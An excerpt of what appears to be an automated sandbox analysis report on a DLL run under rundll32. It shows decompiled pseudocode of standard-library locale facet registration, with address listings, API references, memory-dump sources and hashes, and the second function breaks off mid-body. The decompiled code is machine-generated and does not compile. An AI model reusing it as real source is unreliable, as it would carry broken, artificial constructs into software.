                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID: $n,n
                          • API String ID: 651022567-3748013742
                          • Opcode ID: f2667d9cebe87ca965cd52e37b60528922298404a2dc1f437f81022640f2288e
                          • Instruction ID: a6547bb170d677b3cbd03c7a0d613a1b2f3d707285ca525e638e82ef695a7e22
                          • Opcode Fuzzy Hash: f2667d9cebe87ca965cd52e37b60528922298404a2dc1f437f81022640f2288e
                          • Instruction Fuzzy Hash: E2110E79A0052ECFCB00DBE4C898AEDB7BBAF84B04F140909E110AB390DFB49A40C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F8A5, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E20F8A5(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t111;
				signed int _t112;
				void* _t124;
				void* _t137;
				void* _t150;
				void* _t163;
				void* _t176;
				void* _t189;
				signed int _t283;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				void* _t330;

				_t305 = __edx;
				_t234 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t330 - 0x14, 0);
				_t315 =  *0x6e2c6db0; // 0x0
				 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
				 *(_t330 - 0x10) = _t315;
				_t111 = E6E1E161C(0x6e2c6d64);
				_t237 =  *((intOrPtr*)(_t330 + 8));
				_t112 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t111);
				_t307 = _t112;
				if(_t112 != 0) {
					L5:
					E6E2066BA(_t330 - 0x14);
					return E6E220075(_t307);
				} else {
					if(_t315 == 0) {
						_push( *((intOrPtr*)(_t330 + 8)));
						_push(_t330 - 0x10);
						__eflags = E6E2113A1(__ebx, _t237, __edx, _t307, _t315) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t330 - 0x20);
							E6E223D74(_t330 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t307, _t315, 0x14);
							E6E206653(_t330 - 0x14, 0);
							_t316 =  *0x6e2c6ddc; // 0x0
							 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
							 *(_t330 - 0x10) = _t316;
							_t124 = E6E1E161C(0x6e2c6d88);
							_t244 =  *((intOrPtr*)(_t330 + 8));
							_t308 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t124);
							__eflags = _t308;
							if(_t308 != 0) {
								L12:
								E6E2066BA(_t330 - 0x14);
								return E6E220075(_t308);
							} else {
								__eflags = _t316;
								if(_t316 == 0) {
									_push( *((intOrPtr*)(_t330 + 8)));
									_push(_t330 - 0x10);
									__eflags = E6E211409(_t234, _t244, __edx, _t308, _t316) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t330 - 0x20);
										E6E223D74(_t330 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t234, _t308, _t316, 0x14);
										E6E206653(_t330 - 0x14, 0);
										_t317 =  *0x6e2c6de0; // 0x0
										 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
										 *(_t330 - 0x10) = _t317;
										_t137 = E6E1E161C(0x6e2c6d8c);
										_t251 =  *((intOrPtr*)(_t330 + 8));
										_t309 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t137);
										__eflags = _t309;
										if(_t309 != 0) {
											L19:
											E6E2066BA(_t330 - 0x14);
											return E6E220075(_t309);
										} else {
											__eflags = _t317;
											if(_t317 == 0) {
												_push( *((intOrPtr*)(_t330 + 8)));
												_push(_t330 - 0x10);
												__eflags = E6E211471(_t234, _t251, __edx, _t309, _t317) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t330 - 0x20);
													E6E223D74(_t330 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t234, _t309, _t317, 0x14);
													E6E206653(_t330 - 0x14, 0);
													_t318 =  *0x6e2c6dfc; // 0x0
													 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
													 *(_t330 - 0x10) = _t318;
													_t150 = E6E1E161C(0x6e2c6da8);
													_t258 =  *((intOrPtr*)(_t330 + 8));
													_t310 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t150);
													__eflags = _t310;
													if(_t310 != 0) {
														L26:
														E6E2066BA(_t330 - 0x14);
														return E6E220075(_t310);
													} else {
														__eflags = _t318;
														if(_t318 == 0) {
															_push( *((intOrPtr*)(_t330 + 8)));
															_push(_t330 - 0x10);
															__eflags = E6E2114EC(_t234, _t258, _t305, _t310, _t318) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t330 - 0x20);
																E6E223D74(_t330 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t234, _t310, _t318, 0x14);
																E6E206653(_t330 - 0x14, 0);
																_t319 =  *0x6e2c6dcc; // 0x0
																 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																 *(_t330 - 0x10) = _t319;
																_t163 = E6E1E161C(0x6e2c6d80);
																_t265 =  *((intOrPtr*)(_t330 + 8));
																_t311 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t163);
																__eflags = _t311;
																if(_t311 != 0) {
																	L33:
																	E6E2066BA(_t330 - 0x14);
																	return E6E220075(_t311);
																} else {
																	__eflags = _t319;
																	if(_t319 == 0) {
																		_push( *((intOrPtr*)(_t330 + 8)));
																		_push(_t330 - 0x10);
																		__eflags = E6E211558(_t234, _t265, _t305, _t311, _t319) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t330 - 0x20);
																			E6E223D74(_t330 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t234, _t311, _t319, 0x14);
																			E6E206653(_t330 - 0x14, 0);
																			_t320 =  *0x6e2c6e00; // 0x0
																			 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																			 *(_t330 - 0x10) = _t320;
																			_t176 = E6E1E161C(0x6e2c6dac);
																			_t272 =  *((intOrPtr*)(_t330 + 8));
																			_t312 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t176);
																			__eflags = _t312;
																			if(_t312 != 0) {
																				L40:
																				E6E2066BA(_t330 - 0x14);
																				return E6E220075(_t312);
																			} else {
																				__eflags = _t320;
																				if(_t320 == 0) {
																					_push( *((intOrPtr*)(_t330 + 8)));
																					_push(_t330 - 0x10);
																					__eflags = E6E2115C4(_t234, _t272, _t305, _t312, _t320) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t330 - 0x20);
																						E6E223D74(_t330 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t234, _t312, _t320, 0x14);
																						E6E206653(_t330 - 0x14, 0);
																						_t321 =  *0x6e2c6dd0; // 0x0
																						 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																						 *(_t330 - 0x10) = _t321;
																						_t189 = E6E1E161C(0x6e2c6d60);
																						_t279 =  *((intOrPtr*)(_t330 + 8));
																						_t313 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t189);
																						__eflags = _t313;
																						if(_t313 != 0) {
																							L47:
																							E6E2066BA(_t330 - 0x14);
																							return E6E220075(_t313);
																						} else {
																							__eflags = _t321;
																							if(_t321 == 0) {
																								_push( *((intOrPtr*)(_t330 + 8)));
																								_push(_t330 - 0x10);
																								__eflags = E6E21162A(_t234, _t279, _t305, _t313, _t321) - 0xffffffff;
																								if(__eflags == 0) {
																									_t283 = _t330 - 0x20;
																									E6E1E1438(_t283);
																									E6E223D74(_t330 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e26851f, _t234, _t313, _t321, 4);
																									_t322 = _t283;
																									 *(_t330 - 0x10) = _t322;
																									 *((intOrPtr*)(_t322 + 4)) =  *((intOrPtr*)(_t330 + 0xc));
																									_push( *((intOrPtr*)(_t330 + 0x14)));
																									_t105 = _t330 - 4;
																									 *_t105 =  *(_t330 - 4) & 0x00000000;
																									__eflags =  *_t105;
																									 *_t322 = 0x6e26c0c4;
																									 *((char*)(_t322 + 0x28)) =  *((intOrPtr*)(_t330 + 0x10));
																									E6E21542F(_t234, _t283, _t305, _t313, _t322,  *_t105);
																									return E6E220075(_t322,  *((intOrPtr*)(_t330 + 8)));
																								} else {
																									_t313 =  *(_t330 - 0x10);
																									 *(_t330 - 0x10) = _t313;
																									 *(_t330 - 4) = 1;
																									E6E206FD3(__eflags, _t313);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t313 + 4))))();
																									 *0x6e2c6dd0 = _t313;
																									goto L47;
																								}
																							} else {
																								_t313 = _t321;
																								goto L47;
																							}
																						}
																					} else {
																						_t312 =  *(_t330 - 0x10);
																						 *(_t330 - 0x10) = _t312;
																						 *(_t330 - 4) = 1;
																						E6E206FD3(__eflags, _t312);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t312 + 4))))();
																						 *0x6e2c6e00 = _t312;
																						goto L40;
																					}
																				} else {
																					_t312 = _t320;
																					goto L40;
																				}
																			}
																		} else {
																			_t311 =  *(_t330 - 0x10);
																			 *(_t330 - 0x10) = _t311;
																			 *(_t330 - 4) = 1;
																			E6E206FD3(__eflags, _t311);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t311 + 4))))();
																			 *0x6e2c6dcc = _t311;
																			goto L33;
																		}
																	} else {
																		_t311 = _t319;
																		goto L33;
																	}
																}
															} else {
																_t310 =  *(_t330 - 0x10);
																 *(_t330 - 0x10) = _t310;
																 *(_t330 - 4) = 1;
																E6E206FD3(__eflags, _t310);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t310 + 4))))();
																 *0x6e2c6dfc = _t310;
																goto L26;
															}
														} else {
															_t310 = _t318;
															goto L26;
														}
													}
												} else {
													_t309 =  *(_t330 - 0x10);
													 *(_t330 - 0x10) = _t309;
													 *(_t330 - 4) = 1;
													E6E206FD3(__eflags, _t309);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t309 + 4))))();
													 *0x6e2c6de0 = _t309;
													goto L19;
												}
											} else {
												_t309 = _t317;
												goto L19;
											}
										}
									} else {
										_t308 =  *(_t330 - 0x10);
										 *(_t330 - 0x10) = _t308;
										 *(_t330 - 4) = 1;
										E6E206FD3(__eflags, _t308);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t308 + 4))))();
										 *0x6e2c6ddc = _t308;
										goto L12;
									}
								} else {
									_t308 = _t316;
									goto L12;
								}
							}
						} else {
							_t307 =  *(_t330 - 0x10);
							 *(_t330 - 0x10) = _t307;
							 *(_t330 - 4) = 1;
							E6E206FD3(__eflags, _t307);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t307 + 4))))();
							 *0x6e2c6db0 = _t307;
							goto L5;
						}
					} else {
						_t307 = _t315;
						goto L5;
					}
				}
			}



























                          0x6e20f8a5
                          0x6e20f8a5
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8d6
                          0x6e20f8db
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F8AC
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F8B6
                          • int.LIBCPMT ref: 6E20F8CD
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20F907
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F927
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F945
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID: dm,n
                          • API String ID: 651022567-1177862346
                          • Opcode ID: c62049bfba2d9931af0c89e5a49a84c2050b416cba52b783378c154e42e0e512
                          • Instruction ID: 7963a4779e0788762ceaea4ba09daf98973acaec55f14d88ed6e43071da81ed1
                          • Opcode Fuzzy Hash: c62049bfba2d9931af0c89e5a49a84c2050b416cba52b783378c154e42e0e512
                          • Instruction Fuzzy Hash: 2611E37590051E9BCF00DBE4C894AFEB7BBBF84718F240908E410AB2D0DBB49A45C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F4C1, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20F4C1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t195;
				signed int _t196;
				void* _t208;
				void* _t221;
				void* _t234;
				void* _t247;
				void* _t260;
				void* _t273;
				void* _t286;
				void* _t299;
				void* _t312;
				void* _t325;
				void* _t338;
				void* _t351;
				signed int _t511;
				signed int _t554;
				signed int _t555;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				signed int _t559;
				signed int _t560;
				signed int _t561;
				signed int _t562;
				signed int _t563;
				signed int _t564;
				signed int _t565;
				signed int _t567;
				signed int _t568;
				signed int _t569;
				signed int _t570;
				signed int _t571;
				signed int _t572;
				signed int _t573;
				signed int _t574;
				signed int _t575;
				signed int _t576;
				signed int _t577;
				signed int _t578;
				signed int _t579;
				signed int _t580;
				void* _t594;

				_t551 = __edx;
				_t420 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t594 - 0x14, 0);
				_t567 =  *0x6e2c6dc0; // 0x0
				 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
				 *(_t594 - 0x10) = _t567;
				_t195 = E6E1E161C(0x6e2c6d74);
				_t423 =  *((intOrPtr*)(_t594 + 8));
				_t196 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t195);
				_t553 = _t196;
				if(_t196 != 0) {
					L5:
					E6E2066BA(_t594 - 0x14);
					return E6E220075(_t553);
				} else {
					if(_t567 == 0) {
						_push( *((intOrPtr*)(_t594 + 8)));
						_push(_t594 - 0x10);
						__eflags = E6E2110BF(__ebx, _t423, __edx, _t553, _t567) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t594 - 0x20);
							E6E223D74(_t594 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t553, _t567, 0x14);
							E6E206653(_t594 - 0x14, 0);
							_t568 =  *0x6e2c6df8; // 0x0
							 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
							 *(_t594 - 0x10) = _t568;
							_t208 = E6E1E161C(0x6e2c6da4);
							_t430 =  *((intOrPtr*)(_t594 + 8));
							_t554 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t208);
							__eflags = _t554;
							if(_t554 != 0) {
								L12:
								E6E2066BA(_t594 - 0x14);
								return E6E220075(_t554);
							} else {
								__eflags = _t568;
								if(_t568 == 0) {
									_push( *((intOrPtr*)(_t594 + 8)));
									_push(_t594 - 0x10);
									__eflags = E6E211127(_t420, _t430, __edx, _t554, _t568) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t594 - 0x20);
										E6E223D74(_t594 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t420, _t554, _t568, 0x14);
										E6E206653(_t594 - 0x14, 0);
										_t569 =  *0x6e2c6df4; // 0x0
										 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
										 *(_t594 - 0x10) = _t569;
										_t221 = E6E1E161C(0x6e2c6da0);
										_t437 =  *((intOrPtr*)(_t594 + 8));
										_t555 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t221);
										__eflags = _t555;
										if(_t555 != 0) {
											L19:
											E6E2066BA(_t594 - 0x14);
											return E6E220075(_t555);
										} else {
											__eflags = _t569;
											if(_t569 == 0) {
												_push( *((intOrPtr*)(_t594 + 8)));
												_push(_t594 - 0x10);
												__eflags = E6E2111AB(_t420, _t437, __edx, _t555, _t569) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t594 - 0x20);
													E6E223D74(_t594 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t420, _t555, _t569, 0x14);
													E6E206653(_t594 - 0x14, 0);
													_t570 =  *0x6e2c6dc8; // 0x0
													 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
													 *(_t594 - 0x10) = _t570;
													_t234 = E6E1E161C(0x6e2c6d7c);
													_t444 =  *((intOrPtr*)(_t594 + 8));
													_t556 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t234);
													__eflags = _t556;
													if(_t556 != 0) {
														L26:
														E6E2066BA(_t594 - 0x14);
														return E6E220075(_t556);
													} else {
														__eflags = _t570;
														if(_t570 == 0) {
															_push( *((intOrPtr*)(_t594 + 8)));
															_push(_t594 - 0x10);
															__eflags = E6E211230(_t420, _t444, _t551, _t556, _t570) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t594 - 0x20);
																E6E223D74(_t594 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t420, _t556, _t570, 0x14);
																E6E206653(_t594 - 0x14, 0);
																_t571 =  *0x6e2c6dc4; // 0x0
																 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																 *(_t594 - 0x10) = _t571;
																_t247 = E6E1E161C(0x6e2c6d78);
																_t451 =  *((intOrPtr*)(_t594 + 8));
																_t557 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t247);
																__eflags = _t557;
																if(_t557 != 0) {
																	L33:
																	E6E2066BA(_t594 - 0x14);
																	return E6E220075(_t557);
																} else {
																	__eflags = _t571;
																	if(_t571 == 0) {
																		_push( *((intOrPtr*)(_t594 + 8)));
																		_push(_t594 - 0x10);
																		__eflags = E6E2112B4(_t420, _t451, _t551, _t557, _t571) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t594 - 0x20);
																			E6E223D74(_t594 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t420, _t557, _t571, 0x14);
																			E6E206653(_t594 - 0x14, 0);
																			_t572 =  *0x6e2c6dd8; // 0x0
																			 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																			 *(_t594 - 0x10) = _t572;
																			_t260 = E6E1E161C(0x6e2c6d84);
																			_t458 =  *((intOrPtr*)(_t594 + 8));
																			_t558 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t260);
																			__eflags = _t558;
																			if(_t558 != 0) {
																				L40:
																				E6E2066BA(_t594 - 0x14);
																				return E6E220075(_t558);
																			} else {
																				__eflags = _t572;
																				if(_t572 == 0) {
																					_push( *((intOrPtr*)(_t594 + 8)));
																					_push(_t594 - 0x10);
																					__eflags = E6E211339(_t420, _t458, _t551, _t558, _t572) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t594 - 0x20);
																						E6E223D74(_t594 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t420, _t558, _t572, 0x14);
																						E6E206653(_t594 - 0x14, 0);
																						_t573 =  *0x6e2c6db0; // 0x0
																						 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																						 *(_t594 - 0x10) = _t573;
																						_t273 = E6E1E161C(0x6e2c6d64);
																						_t465 =  *((intOrPtr*)(_t594 + 8));
																						_t559 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t273);
																						__eflags = _t559;
																						if(_t559 != 0) {
																							L47:
																							E6E2066BA(_t594 - 0x14);
																							return E6E220075(_t559);
																						} else {
																							__eflags = _t573;
																							if(_t573 == 0) {
																								_push( *((intOrPtr*)(_t594 + 8)));
																								_push(_t594 - 0x10);
																								__eflags = E6E2113A1(_t420, _t465, _t551, _t559, _t573) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t594 - 0x20);
																									E6E223D74(_t594 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t420, _t559, _t573, 0x14);
																									E6E206653(_t594 - 0x14, 0);
																									_t574 =  *0x6e2c6ddc; // 0x0
																									 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																									 *(_t594 - 0x10) = _t574;
																									_t286 = E6E1E161C(0x6e2c6d88);
																									_t472 =  *((intOrPtr*)(_t594 + 8));
																									_t560 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t286);
																									__eflags = _t560;
																									if(_t560 != 0) {
																										L54:
																										E6E2066BA(_t594 - 0x14);
																										return E6E220075(_t560);
																									} else {
																										__eflags = _t574;
																										if(_t574 == 0) {
																											_push( *((intOrPtr*)(_t594 + 8)));
																											_push(_t594 - 0x10);
																											__eflags = E6E211409(_t420, _t472, _t551, _t560, _t574) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t594 - 0x20);
																												E6E223D74(_t594 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t420, _t560, _t574, 0x14);
																												E6E206653(_t594 - 0x14, 0);
																												_t575 =  *0x6e2c6de0; // 0x0
																												 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																												 *(_t594 - 0x10) = _t575;
																												_t299 = E6E1E161C(0x6e2c6d8c);
																												_t479 =  *((intOrPtr*)(_t594 + 8));
																												_t561 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t299);
																												__eflags = _t561;
																												if(_t561 != 0) {
																													L61:
																													E6E2066BA(_t594 - 0x14);
																													return E6E220075(_t561);
																												} else {
																													__eflags = _t575;
																													if(_t575 == 0) {
																														_push( *((intOrPtr*)(_t594 + 8)));
																														_push(_t594 - 0x10);
																														__eflags = E6E211471(_t420, _t479, _t551, _t561, _t575) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t594 - 0x20);
																															E6E223D74(_t594 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t420, _t561, _t575, 0x14);
																															E6E206653(_t594 - 0x14, 0);
																															_t576 =  *0x6e2c6dfc; // 0x0
																															 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																															 *(_t594 - 0x10) = _t576;
																															_t312 = E6E1E161C(0x6e2c6da8);
																															_t486 =  *((intOrPtr*)(_t594 + 8));
																															_t562 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t312);
